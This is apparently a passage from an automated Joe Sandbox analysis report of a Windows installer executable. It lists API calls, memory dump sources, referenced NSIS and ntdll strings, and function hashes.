                                • lstrcatW.KERNEL32(00000000,00000000,0040A0C8,00435000,00000000,00000000,00000031,00000000,00000000,000000EF,?,?,00000000,00000000), ref: 00401920
                                • CompareFileTime.KERNEL32(-00000014,00000000,0040A0C8,0040A0C8,00000000,00000000,0040A0C8,00435000,00000000,00000000,00000031,00000000,00000000,000000EF), ref: 00401948
                                • SetFileTime.KERNEL32(00000000,000000FF,00000000,000000FF,0040A0C8,00000000,00000000,00000000,000000EA,00000000,0040A0C8,40000000,00000001,0040A0C8,00000000), ref: 00401A5A
                                • CloseHandle.KERNEL32(00000000), ref: 00401A61
                                • lstrcatW.KERNEL32(0040A0C8,00000000,0040A0C8,000000E9), ref: 00401A82
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: File$PathWindow$AttributesNameShowTimelstrcat$CloseCompareCurrentDirectoryForegroundFullHandleMessageMovePostQuitSearchShortSleep
                                • String ID:
                                • API String ID: 3895412863-0
                                • Opcode ID: b1db98a04f2ea93b77a26ffd797c3cbd4516fe2c3c1e967b323529ad46c310ba
                                • Instruction ID: ebeff723cfbe9b45e3b0b0a6f17a4e6c0cbf30734010ce9bbeaf93aeca8f714e
                                • Opcode Fuzzy Hash: b1db98a04f2ea93b77a26ffd797c3cbd4516fe2c3c1e967b323529ad46c310ba
                                • Instruction Fuzzy Hash: 93D1F971614301ABC720BF26CD85D2B76A8EF85758F10463FF452B22E1DB7CD8029A6E
                                APIs
                                • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,00000000,?,00406239,?,?), ref: 0040631C
                                • GetShortPathNameW.KERNEL32(00000000,00426E48,00000400), ref: 00406325
                                • GetShortPathNameW.KERNEL32(?,00426648,00000400), ref: 00406342
                                • wsprintfA.USER32 ref: 00406360
                                • GetFileSize.KERNEL32(00000000,00000000,00426648,C0000000,00000004,00426648,?), ref: 00406398
                                • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 004063A8
                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 004063D8
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00426248,00000000,-0000000A,00408984,00000000,[Rename],00000000,00000000,00000000), ref: 004063F8
                                • GlobalFree.KERNEL32(00000000), ref: 0040640A
                                • CloseHandle.KERNEL32(00000000), ref: 00406411
                                  • Part of subcall function 004068F6: GetFileAttributesW.KERNEL32(00000003,0040340A,00437800,80000000,00000003,?,?,?,?,?), ref: 004068FA
                                  • Part of subcall function 004068F6: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000000,00000000,?,?,?,?,?), ref: 0040691A
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: File$CloseGlobalHandleNamePathShort$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                • String ID: %ls=%ls$HfB$HnB$[Rename]
                                • API String ID: 2900126502-165592708
                                • Opcode ID: 0ea2030678874ad7a3f9729cc5491540557c07a213c150c7bef55d2ab97d4cc7
                                • Instruction ID: 28d4088f706ad7906ef0a9a5075647bec21de1d5f4d95c1c1de34b852c29caff
                                • Opcode Fuzzy Hash: 0ea2030678874ad7a3f9729cc5491540557c07a213c150c7bef55d2ab97d4cc7
                                • Instruction Fuzzy Hash: 9431E5B12002217BD6206B359D49F7B3A5CDF81748F56443EF942BA2C2DA7DD8624A7C
                                APIs
                                • GetDlgItem.USER32(?,000003FB), ref: 004040B1
                                • SetWindowTextW.USER32(00000000,?), ref: 004040DB
                                  • Part of subcall function 00406A15: GetDlgItemTextW.USER32(?,?,00000400,00404F27), ref: 00406A28
                                  • Part of subcall function 00406D18: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,00436800,00000000,00436800,00403C8C,00436800,76073420,0040399D), ref: 00406D8D
                                  • Part of subcall function 00406D18: CharNextW.USER32(?,?,?,00000000), ref: 00406D9C
                                  • Part of subcall function 00406D18: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,00436800,00000000,00436800,00403C8C,00436800,76073420,0040399D), ref: 00406DA1
                                  • Part of subcall function 00406D18: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,00436800,00000000,00436800,00403C8C,00436800,76073420,0040399D), ref: 00406DB9
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Char$Next$ItemText$PrevWindow
                                • String ID: A
                                • API String ID: 4089110348-3554254475
                                • Opcode ID: 7ee0f7904150dc878aeeec4f98168d1ec89735afe044028777f232ef559c64d1
                                • Instruction ID: 90192ee12d8343b5cbbbf9dcfc6b809e920884bf694149bd8a4c84d13eeda86d
                                • Opcode Fuzzy Hash: 7ee0f7904150dc878aeeec4f98168d1ec89735afe044028777f232ef559c64d1
                                • Instruction Fuzzy Hash: E391B1B1704311ABD720AFA6DD81A6B76A8AF84704F40043FFB45B62D1DB7CD9418B6E
                                APIs
                                • GetTickCount.KERNEL32 ref: 004033DB
                                • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400,?,?,?,?,?), ref: 004033F7
                                  • Part of subcall function 004068F6: GetFileAttributesW.KERNEL32(00000003,0040340A,00437800,80000000,00000003,?,?,?,?,?), ref: 004068FA
                                  • Part of subcall function 004068F6: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000000,00000000,?,?,?,?,?), ref: 0040691A
                                • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,00435800,00435800,00437800,00437800,80000000,00000003,?,?,?,?,?), ref: 00403441
                                • GlobalAlloc.KERNEL32(00000040,?,?,?,?,?,?), ref: 0040359B
                                Strings
                                • Null, xrefs: 004034C9
                                • soft, xrefs: 004034BF
                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 0040361B
                                • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004033CE
                                • Error launching installer, xrefs: 00403417
                                • Inst, xrefs: 004034B5
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                • API String ID: 2803837635-787788815
                                • Opcode ID: 063ae2e08def868f8eacef01b396c4efa7ff10199d47aae5f76f976b6e82b3ce
                                • Instruction ID: a22a3d629960f4d7b6f8438a3768dc05bd31f949a9b5a180d7de35419ae1bb07
                                • Opcode Fuzzy Hash: 063ae2e08def868f8eacef01b396c4efa7ff10199d47aae5f76f976b6e82b3ce
                                • Instruction Fuzzy Hash: 2B51EE71640300AFD720AF21DD81B1B7AA8AB88719F10493FF985772E1C7398E458B6E
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: HEAP:
                                • API String ID: 3446177414-2466845122
                                • Opcode ID: 4d892a74a398271a3eb768a347cca903e8cd2725cbd2fecb733c40d6b6cbcab0
                                • Instruction ID: f6b79509155fbd2e223b9687e5578e38560cf82aa1bedb5a803c09f57a12c1f7
                                • Opcode Fuzzy Hash: 4d892a74a398271a3eb768a347cca903e8cd2725cbd2fecb733c40d6b6cbcab0
                                • Instruction Fuzzy Hash: 2FA18B75A043118FD708CE28C896A2AB7E5FF88358F59897DEA45DB310EB70EC45CB91
                                APIs
                                • GetSystemDirectoryW.KERNEL32(00427CA0,00000400), ref: 00405FBF
                                  • Part of subcall function 00406AF5: lstrcpynW.KERNEL32(?,?,00000400,0040384C,00428D00,NSIS Error), ref: 00406B02
                                  • Part of subcall function 00406D18: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,00436800,00000000,00436800,00403C8C,00436800,76073420,0040399D), ref: 00406D8D
                                  • Part of subcall function 00406D18: CharNextW.USER32(?,?,?,00000000), ref: 00406D9C
                                  • Part of subcall function 00406D18: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,00436800,00000000,00436800,00403C8C,00436800,76073420,0040399D), ref: 00406DA1
                                  • Part of subcall function 00406D18: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,00436800,00000000,00436800,00403C8C,00436800,76073420,0040399D), ref: 00406DB9
                                • GetWindowsDirectoryW.KERNEL32(00427CA0,00000400,00424200,?,?,?,?,?,00000000,?,?), ref: 00405FD2
                                • lstrcatW.KERNEL32(00427CA0,\Microsoft\Internet Explorer\Quick Launch,?,?,00424200,?,?,?,?,?,00000000,?,?), ref: 0040604B
                                • lstrlenW.KERNEL32(00427CA0,00424200,?,?,?,?,?,00000000,?,?), ref: 004060A5
                                Strings
                                • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406045
                                • Software\Microsoft\Windows\CurrentVersion, xrefs: 00405F8A
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Char$Next$Directory$PrevSystemWindowslstrcatlstrcpynlstrlen
                                • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                • API String ID: 4187626192-730719616
                                • Opcode ID: e881fb0b28361bdc3f8f7ae5213684426e418320bb2e4e194c901d83aeea876e
                                • Instruction ID: 94fe74e46bfd99ff5e6600c27bcf33d7150fb5fb58e2d65541bf0035bd99d3a3
                                • Opcode Fuzzy Hash: e881fb0b28361bdc3f8f7ae5213684426e418320bb2e4e194c901d83aeea876e
                                • Instruction Fuzzy Hash: 0F61E5312442159BDB20AB288D40A3B77A4EF58750F11443FF986F72D1DB7CD9219BAE
                                Strings
                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 32DB4592
                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 32DB4460
                                • Execute=1, xrefs: 32DB451E
                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 32DB454D
                                • ExecuteOptions, xrefs: 32DB44AB
                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 32DB4530
                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 32DB4507
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                 • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                • API String ID: 0-484625025
                                • Opcode ID: 20417e84a9a0dc4e9e07421efb340009da0a47822612df4fe5165c54fe5f119a
                                • Instruction ID: 68c46373b1acd962265a3e7a698ffc65856be9a51ede7c4d93274fe443e87027
                                • Opcode Fuzzy Hash: 20417e84a9a0dc4e9e07421efb340009da0a47822612df4fe5165c54fe5f119a
                                • Instruction Fuzzy Hash: B651B471A00359AAFF14DFA8EC95FAD77A8AF08744F4008E9D505A7381EFB4DA45CE60
                                Strings
                                • SsHd, xrefs: 32D5A304
                                • Actx , xrefs: 32DA7819, 32DA7880
                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 32DA77DD, 32DA7802
                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32DA7807
                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32DA77E2
                                • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 32DA78F3
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                 • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                • API String ID: 0-1988757188
                                • Opcode ID: e96549bfc15c61eda963decbf2ac7711bc26cf2cda0d2d876f8c66553204eb34
                                • Instruction ID: 4bf356d602ef98d4573ef7908d3b58b0cc0fb73d1004876675b611fe10fa72ef
                                • Opcode Fuzzy Hash: e96549bfc15c61eda963decbf2ac7711bc26cf2cda0d2d876f8c66553204eb34
                                • Instruction Fuzzy Hash: BDE1D1746043128FFB05CE64C890B5E77E1BF85368F604A2DE9A5CB390DBB1D945CB92
                                Strings
                                • Actx , xrefs: 32DA9315
                                • GsHd, xrefs: 32D5D794
                                • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 32DA9372
                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 32DA914E, 32DA9173
                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32DA9178
                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32DA9153
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                 • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                • API String ID: 3446177414-2196497285
                                • Opcode ID: 24fae1df5e06af59140079425f3b9bf7475d665785853b870968a9a61e66b9fc
                                • Instruction ID: 2590af2b87b62bd9aeee32bfe6abaa0d0fd3ddea4a67f5de622bec0d4c78c816
                                • Opcode Fuzzy Hash: 24fae1df5e06af59140079425f3b9bf7475d665785853b870968a9a61e66b9fc
                                • Instruction Fuzzy Hash: E2E1A374604341CFEB04CF14C890B4ABBE4BF88758F504A6DE995CB395DBB5E844CBA2
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                 • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                • API String ID: 3446177414-4227709934
                                • Opcode ID: cf03ef153d0e8247d7d147d808c9955694e44830059b7af548a27eb457613414
                                • Instruction ID: aa63c9da7dc5df7745d4369934f4c2feba04342501ba1d2f1a90fb5f888ad9ce
                                • Opcode Fuzzy Hash: cf03ef153d0e8247d7d147d808c9955694e44830059b7af548a27eb457613414
                                • Instruction Fuzzy Hash: 184149B9A01209AFDF05CF98C891ADEBBB5EF49758F504029F905AB350DB71DA41CBA0
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                • String ID:
                                • API String ID: 2320649405-0
                                • Opcode ID: bf0799ea3bd6f053e04a74c3ecacf9df28762d59f89d86d460fcd2570ffda868
                                • Instruction ID: fd6d678b7fcced70b4665a1fbec2e56912b3eb02c270adc19d2dd25120f6a122
                                • Opcode Fuzzy Hash: bf0799ea3bd6f053e04a74c3ecacf9df28762d59f89d86d460fcd2570ffda868
                                • Instruction Fuzzy Hash: 4B21F675500B04DFDB749F28DA4895B77B4EF05710B108A3EE896B26A1DB38E814CF24
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                 • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                • API String ID: 3446177414-3492000579
                                • Opcode ID: 873f4c8c80fe7307f7963a38ad1de25d7de6a2fdf887d248a31a0acb0fe3bb86
                                • Instruction ID: 96c0db70f5a2969d6f77981bf6128f4753836d60ec390f7255219a98a2dcb1a5
                                • Opcode Fuzzy Hash: 873f4c8c80fe7307f7963a38ad1de25d7de6a2fdf887d248a31a0acb0fe3bb86
                                • Instruction Fuzzy Hash: 2F714335902688DFDB06CFA8D490AADFBF2FF49344F448059E586AF351CB759981CBA0
                                Strings
                                • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 32D99843
                                • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 32D99885
                                • LdrpLoadShimEngine, xrefs: 32D9984A, 32D9988B
                                • minkernel\ntdll\ldrinit.c, xrefs: 32D99854, 32D99895
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                 • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                • API String ID: 3446177414-3589223738
                                • Opcode ID: 4d785a2fa27a0e5a3a3df7a77711bf30fd6ddde0c20e567b3d04966a93f6e502
                                • Instruction ID: 6d4cbab0dcc6250d17e58b84207472d8fed60995e05a4c71b7acf7028b18cfdf
                                • Opcode Fuzzy Hash: 4d785a2fa27a0e5a3a3df7a77711bf30fd6ddde0c20e567b3d04966a93f6e502
                                • Instruction Fuzzy Hash: B1513676A023889FDB05DBB8C855FDD77A5BB40304F840569E651BF395CBB09C81C7A4
                                APIs
                                • ReadFile.KERNEL32(00000000,?,?,?), ref: 00402994
                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004029D4
                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402A07
                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,00000001,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402A1F
                                • SetFilePointer.KERNEL32(?,?,?,00000001,00000000,?,00000002), ref: 00402ADC
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: File$ByteCharMultiPointerWide$Read
                                • String ID: 9
                                • API String ID: 1439708474-2366072709
                                • Opcode ID: de9a9b87b4d54610843938f2c97b6a216896488e6d5b1f8db430457174f1f012
                                • Instruction ID: 06df5d1e4fd17f9c1e4dafe2560c0fdc737aa95be89056b4b35a237a27527231
                                • Opcode Fuzzy Hash: de9a9b87b4d54610843938f2c97b6a216896488e6d5b1f8db430457174f1f012
                                • Instruction Fuzzy Hash: 305139B1618341AFD724DF11CA44A2BB7E8BFD5304F00483FF985A62D0DBB9D9458B6A
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                 • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                • API String ID: 3446177414-3224558752
                                • Opcode ID: 9e08aeca1a5a073bc434c14c4cc099e9491eac2f7232596e0f730b9c569d2da6
                                • Instruction ID: b7bfc85e13f50f76a02a408c66727456a82435be40d244d6e11dda7b17b5db73
                                • Opcode Fuzzy Hash: 9e08aeca1a5a073bc434c14c4cc099e9491eac2f7232596e0f730b9c569d2da6
                                • Instruction Fuzzy Hash: 9C418B35608700DFE316CF24D450B6AB7B4FF40328F5485A8E9456F781CBBAA985CBA1
                                Strings
                                • Entry Heap Size , xrefs: 32DEEDED
                                • HEAP: , xrefs: 32DEECDD
                                • ---------------------------------------, xrefs: 32DEEDF9
                                • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 32DEEDE3
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                 • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                • API String ID: 3446177414-1102453626
                                • Opcode ID: e5cf935116600411b02e83c92d0e373bd05fc06f9b94b47c27e1d9847cdfd2b2
                                • Instruction ID: a11e85e3783ca54b2c91f14668ba561e4f64ccd8459e0d4afa99e92dae2729cc
                                • Opcode Fuzzy Hash: e5cf935116600411b02e83c92d0e373bd05fc06f9b94b47c27e1d9847cdfd2b2
                                • Instruction Fuzzy Hash: 7C41043AA02215CFC705DF14C48194ABBF1FF89365B5684A9D505AB310CB31ECC2CBD0
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                 • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                • API String ID: 3446177414-1222099010
                                • Opcode ID: abe053bdeaf3a30ce5572d66d3a1fa67fb57fa292114eb00423c2bd507547338
                                • Instruction ID: 5008471e684c71f037130cbbff939038ee67be47ee03f3bbd9f2d57494585e84
                                • Opcode Fuzzy Hash: abe053bdeaf3a30ce5572d66d3a1fa67fb57fa292114eb00423c2bd507547338
                                • Instruction Fuzzy Hash: 14319836101784EFF326CB28E419F6977F4EF05758F0144C4E8416BBA5CBBAE984CA61
                                APIs
                                • CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,00436800,00000000,00436800,00403C8C,00436800,76073420,0040399D), ref: 00406D8D
                                • CharNextW.USER32(?,?,?,00000000), ref: 00406D9C
                                • CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,00436800,00000000,00436800,00403C8C,00436800,76073420,0040399D), ref: 00406DA1
                                • CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,00436800,00000000,00436800,00403C8C,00436800,76073420,0040399D), ref: 00406DB9
                                Strings
                                • *?|<>/":, xrefs: 00406D7C
